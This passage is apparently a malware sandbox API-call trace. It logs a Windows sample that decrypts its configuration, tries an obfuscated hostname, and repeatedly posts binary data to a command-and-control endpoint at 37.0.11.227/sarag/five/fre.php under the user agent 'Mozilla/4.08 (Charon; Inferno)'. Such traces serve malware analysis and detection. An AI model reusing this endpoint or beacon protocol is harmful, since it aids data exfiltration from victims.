binary\r\n") returned 177 [0319.069] GetProcessHeap () returned 0x690000 [0319.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0319.070] GetProcessHeap () returned 0x690000 [0319.070] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0319.070] GetProcessHeap () returned 0x690000 [0319.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0319.070] GetProcessHeap () returned 0x690000 [0319.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0319.071] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0319.072] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0319.072] GetProcessHeap () returned 0x690000 [0319.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0319.072] GetProcessHeap () returned 0x690000 [0319.074] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0319.074] send (s=0xae0, buf=0x6ad508*, len=242, flags=0) returned 242 [0319.075] send (s=0xae0, buf=0x6aba40*, len=159, flags=0) returned 159 [0319.075] GetProcessHeap () returned 0x690000 [0319.075] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0319.075] recv (in: s=0xae0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0319.163] GetProcessHeap () returned 0x690000 [0319.163] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0319.164] GetProcessHeap () returned 0x690000 [0319.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0319.164] GetProcessHeap () returned 0x690000 [0319.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0319.164] GetProcessHeap () returned 0x690000 [0319.165] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0319.165] closesocket (s=0xae0) returned 0 [0319.165] GetProcessHeap () returned 0x690000 [0319.165] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0319.165] GetProcessHeap () returned 0x690000 [0319.166] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0319.166] GetProcessHeap () returned 0x690000 [0319.166] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0319.166] GetProcessHeap () returned 0x690000 [0319.166] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0319.167] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1828) returned 0xae0 [0319.168] Sleep (dwMilliseconds=0xea60) [0319.169] GetProcessHeap () returned 0x690000 [0319.169] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0319.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.170] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.182] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0319.195] GetProcessHeap () returned 0x690000 [0319.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0319.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.196] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0319.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.196] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.197] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.197] GetProcessHeap () returned 0x690000 [0319.198] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0319.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.200] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0319.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.201] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0319.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.202] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0319.202] GetProcessHeap () returned 0x690000 [0319.202] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0319.202] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.202] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0319.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.203] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0319.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.204] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0319.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.205] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0319.205] GetProcessHeap () returned 0x690000 [0319.205] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0319.205] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0319.206] GetProcessHeap () returned 0x690000 [0319.206] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0319.206] GetProcessHeap () returned 0x690000 [0319.207] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0319.207] GetProcessHeap () returned 0x690000 [0319.207] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0319.207] GetProcessHeap () returned 0x690000 [0319.207] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0319.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.213] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.224] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0319.229] GetProcessHeap () returned 0x690000 [0319.229] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0319.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.232] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0319.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.233] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.234] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.234] GetProcessHeap () returned 0x690000 [0319.235] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0319.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.235] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0319.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.236] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0319.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.237] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0319.237] GetProcessHeap () returned 0x690000 [0319.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0319.238] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.238] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0319.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.239] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0319.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.240] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0319.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.241] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0319.241] GetProcessHeap () returned 0x690000 [0319.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0319.241] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0319.241] GetProcessHeap () returned 0x690000 [0319.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0319.241] socket (af=2, type=1, protocol=6) returned 0xae4 [0319.242] connect (s=0xae4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0319.280] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0319.297] GetProcessHeap () returned 0x690000 [0319.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0319.297] GetProcessHeap () returned 0x690000 [0319.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0319.298] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0319.299] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0319.299] GetProcessHeap () returned 0x690000 [0319.299] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0319.299] GetProcessHeap () returned 0x690000 [0319.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0319.300] GetProcessHeap () returned 0x690000 [0319.300] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0319.300] GetProcessHeap () returned 0x690000 [0319.300] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0319.300] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0319.301] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0319.301] GetProcessHeap () returned 0x690000 [0319.301] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0319.301] GetProcessHeap () returned 0x690000 [0319.301] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0319.302] send (s=0xae4, buf=0x6ad508*, len=242, flags=0) returned 242 [0319.302] send (s=0xae4, buf=0x6aba40*, len=159, flags=0) returned 159 [0319.302] GetProcessHeap () returned 0x690000 [0319.302] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0319.303] recv (in: s=0xae4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0319.378] GetProcessHeap () returned 0x690000 [0319.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0319.379] GetProcessHeap () returned 0x690000 [0319.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0319.379] GetProcessHeap () returned 0x690000 [0319.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0319.379] GetProcessHeap () returned 0x690000 [0319.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0319.380] closesocket (s=0xae4) returned 0 [0319.380] GetProcessHeap () returned 0x690000 [0319.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0319.380] GetProcessHeap () returned 0x690000 [0319.381] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0319.381] GetProcessHeap () returned 0x690000 [0319.381] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0319.381] GetProcessHeap () returned 0x690000 [0319.382] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0319.393] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x182c) returned 0xae4 [0319.396] Sleep (dwMilliseconds=0xea60) [0319.398] GetProcessHeap () returned 0x690000 [0319.398] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0319.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.399] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.408] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0319.413] GetProcessHeap () returned 0x690000 [0319.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0319.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.414] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0319.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.417] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.421] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.421] GetProcessHeap () returned 0x690000 [0319.421] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0319.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.422] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0319.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.423] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0319.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.424] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0319.424] GetProcessHeap () returned 0x690000 [0319.424] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0319.424] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.424] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0319.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.425] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0319.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.428] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0319.429] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.429] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0319.429] GetProcessHeap () returned 0x690000 [0319.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0319.429] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0319.429] GetProcessHeap () returned 0x690000 [0319.429] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0319.429] GetProcessHeap () returned 0x690000 [0319.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0319.430] GetProcessHeap () returned 0x690000 [0319.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0319.430] GetProcessHeap () returned 0x690000 [0319.430] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0319.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.431] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.435] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0319.440] GetProcessHeap () returned 0x690000 [0319.440] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0319.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.441] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0319.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.442] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.443] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.443] GetProcessHeap () returned 0x690000 [0319.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0319.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.444] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0319.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.445] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0319.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.446] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0319.446] GetProcessHeap () returned 0x690000 [0319.446] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0319.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.447] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0319.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.447] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0319.450] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.450] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0319.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.451] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0319.451] GetProcessHeap () returned 0x690000 [0319.451] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0319.451] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0319.451] GetProcessHeap () returned 0x690000 [0319.451] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0319.451] socket (af=2, type=1, protocol=6) returned 0xae8 [0319.451] connect (s=0xae8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0319.484] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0319.484] GetProcessHeap () returned 0x690000 [0319.484] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0319.484] GetProcessHeap () returned 0x690000 [0319.484] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0319.485] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0319.485] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0319.485] GetProcessHeap () returned 0x690000 [0319.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0319.485] GetProcessHeap () returned 0x690000 [0319.486] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0319.486] GetProcessHeap () returned 0x690000 [0319.486] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0319.486] GetProcessHeap () returned 0x690000 [0319.486] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0319.487] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0319.487] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0319.487] GetProcessHeap () returned 0x690000 [0319.487] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0319.487] GetProcessHeap 